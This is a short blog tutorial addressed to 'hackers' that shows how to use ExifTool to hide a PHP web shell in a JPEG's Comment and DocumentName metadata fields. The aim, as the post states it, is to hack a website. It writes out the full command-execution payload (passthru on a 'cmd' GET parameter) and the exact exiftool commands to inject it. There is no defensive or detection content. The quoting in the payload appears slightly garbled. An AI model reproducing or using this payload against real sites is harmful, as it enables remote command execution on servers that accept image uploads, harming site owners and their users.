Hide Payload/Malicious Code in Image File Using ExifTool
Hello hackers, in this article I’m going to show how to hide a payload in an image file using ExifTool. Let’s see:
Table of Contents
Install ExifTool
At first, we need to install ExifTool. You can download and install it from exiftool.org. If you need help regarding installation, please comment below. I’ll try to help.
Take an Image
Let’s take an image file to inject a payload. I’ve taken an image named flower.jpg. I’ll set the payload in this file.
Before injecting malicious code, let’s take a look at the metadata of the image file. Run this command:
exiftool flower.jpg
Output:
Inject Payload
Open terminal from your image file location and run this command:
exiftool -comment='<?php passthru(\$_GET'cmd'); _halt_compiler(); ?>' flower.jpg
Now check metadata using exiftool flower.jpg
command:
We can also set payload in the “Document Name” meta field. To do this, run this command:
exiftool -documentname='<?php passthru(\$_GET'cmd'); _halt_compiler(); ?>' flower.jpg
Check metadata:
We have successfully hidden the malicious code in an image file. Using this image file, we can try to hack a website.
That’s it. Thanks for reading. 🙂
Md Obydullah
Software Engineer | Ethical Hacker & Cybersecurity...
Md Obydullah is a software engineer and full stack developer specialist at Laravel, Django, Vue.js, Node.js, Android, Linux Server, and Ethichal Hacking.